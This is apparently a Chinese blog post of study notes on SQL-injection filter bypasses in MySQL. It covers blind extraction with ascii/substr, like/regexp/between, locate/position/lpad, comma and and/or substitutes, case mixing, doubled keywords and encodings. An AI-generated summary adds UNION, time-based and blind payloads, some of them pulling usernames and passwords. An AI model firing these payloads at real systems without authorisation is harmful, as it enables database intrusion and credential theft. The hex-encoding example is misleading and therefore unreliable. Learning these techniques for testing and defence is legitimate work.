sql的bypass

本文介绍了在SQL注入攻击中,如何利用>、<、ASCII函数、LIKE、REGEXP、BETWEEN等技巧以及编码绕过方法来避开过滤,实现对数据库的非预期访问。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

等号被过滤
substr、mid被过滤
逗号被过滤
and/or被过滤
常见的绕过方式

等号被过滤

1.使用>,<,<>

and ascii(substr(database(),1,1))>xxx
在这里插入图片描述
利用user函数得到用户名在通过substr函数截取看第一位的ascii码是否小于115
在这里插入图片描述
在这里插入图片描述

就这样一步一步的测,例子小于115成立小于114不成立很显然这个值ascii是等于114的,然后通过ascii码表查看即可
在这里插入图片描述
注意,这里<>,<,>是算术运算符,所以要用ascii转换一下,如果不用也可以用like进行比较
在这里插入图片描述

2,采用like,rlike语句

like有两个通配符%(匹配多个)和_(只能匹配一个)
于是可以通过一次一次的加下划线来测出长度
在这里插入图片描述
rlike(regexp正则)
“^”:以什么开头
“$”:以什么结尾
“.”:匹配单个字符
“*”:匹配前面的子表达式零次或多次。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以通过“.”来判断是否到了最后一位
**

3.采用regexp,in,between

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
between是一个区间
在这里插入图片描述

substr、mid被过滤

采用locate,position,instr,lpad,rpad
Locate(str1,str2)返回str1字符串在str2里第一次出现的位置,没有返回0
Locate(str1,str2,pos)返回str1字符串在str2里pos(起始位置)出现的位置,没有返回0pos必须大于第一次出现的位置,才能显示第二次出现的位置
在这里插入图片描述
查看我的‘r’在user()的位置
在这里插入图片描述
后面的参数3不是说,后面找的时候第一参数变成1,只是说在这个字符串中,他会从第三位往后找,返回的还是原来字符串的位置,而且返回是子字符串第一个字符的位置
在这里插入图片描述
这里是返回字符“o”的位置

position(‘t’ in database())=1

返回str1字符串在str2出现的位置,没有返回0
注:它里面需要用in,没有逗号隔开
在这里插入图片描述
字母’r’在不在我的用户名中,也是返回第一个字母位置
没有起始值的参数,所以我们只能一个一个的判断
列如:判断了r存在且是第一个然后我们
ra看在不在,rb…等然后当我们找到了ro
然后oa继续找或则roa找

instr(str,子串)

查找一个字符串中子字符串第一次出现的位置,如果没有找到,则返回0(从1开始)跟position类似

LPAD和RPAD

Mysql数据库中用于字符串前面或者后面填充特定字符的函数
select lpad(user(),1,‘’)=‘r’;
select rpad(user(),1,‘’)=‘t’;
在这里插入图片描述
参数1的长度无法满足参数二的长度时,参数3才会执行,满足就输出参数1对应参数2的长度
列如;参数1有7位(1234567),参数2为1,满足则会输出1

逗号被过滤

1.采用%2C
数据库无法使用%2C,因为无法解析,所以这个过滤在浏览器中执行
2.采用from xx for xx,from(x)
and substr(database() from 2 for 1)=‘e’
在这里插入图片描述
在这里插入图片描述
提取从第几位开始,检索后面的字符

and/or被过滤

使用&&、||或则like
注:在mysql中 and与or 是可以用 &&和|相互代替的如:and 1=1->&&1=1
or 1=1 ->l1=1
不过在oracle中,||为拼接字符,如:‘a||b’->'ab’,相当于mysql中的concat()
like后面需要接判断函数,报错函数等

常见的绕过方式

关键字被过滤时
1.大小写绕过,如User(),dAtaBASE(),SelEct等
2.只过滤一次时,双重关键字绕过,如selselectect,ununionion,oorr等。
3.and/or+空格被替换为空时,andand+空格(oror+空格)绕过
4.注释符绕过,//,,//,#**,–+,-- -,;,%00,–a,/* !*/
5.编码绕过:如URLEncode编码,ASCI,HEX,unicode编码绕过:等等…
在这里插入图片描述
前面5位数,不能超过你的版本号

本人能力有限,此学习笔记仅为个人见解,如有错误,欢迎批评指正!

### SQL注入绕过技术概述 SQL注入是一种常见的攻击方式,通过向应用程序输入恶意的SQL语句来操控数据库的行为。为了应对安全防护措施(如WAF、过滤器等),攻击者通常会采用各种绕过技术。以下是几种常用的SQL注入绕过方法: #### 1. 使用编码和转义字符 许多Web应用会对特殊字符(如单引号 `'` 或双引号 `"`)进行过滤或转义处理。在这种情况下,可以尝试使用十六进制编码或其他形式的字符串表示法来规避检测。例如,在某些环境中,可以通过将字符串转换为十六进制格式来实现绕过[^1]。 ```sql -- 原始payload ' OR '1'='1 -- 十六进制编码后的payload 0x27204F5220313D31 ``` #### 2. 利用注释符分割查询 一些防御机制可能会简单地匹配特定的关键字(如 `UNION SELECT`)。此时,可以利用SQL中的注释符(如 `/* */` 或 `--`)来混淆关键字,从而避开简单的正则表达式过滤。 ```sql ' UNION /* test */ SELECT username, password FROM users -- ``` #### 3. 时间盲注与布尔盲注 当无法直接看到错误消息或返回数据时,时间盲注和布尔盲注成为有效的手段。这些技术依赖于条件判断或延迟响应来推断数据库的内容[^2]。例如,以下是一个基于时间延迋试探的例子: ```sql ' AND IF(SUBSTRING(database(),1,1)='t', SLEEP(5), 0) -- ``` 此payload会在当前数据库名称的第一个字母为`t`的情况下触发5秒延迟。 #### 4. 替代函数与操作符 部分系统可能禁用了敏感函数(如 `SLEEP()` 或 `WAITFOR DELAY`),但仍然允许其他功能相似的操作符或命令执行。探索并替换被封锁的功能可能是成功实施攻击的关键之一。 ```sql ' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1),1,1))=116 -- ``` 上述例子展示了如何不借助显式的等待指令而逐步提取表名的信息。 #### 工具辅助下的自动化测试 工具如 **sqlmap** 能够自动扫描目标是否存在漏洞,并提供多种高级选项用于探测不同类型的SQL注入缺陷及其对应的绕过策略。运行此类程序前需确保拥有合法权限以免违反法律条款。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值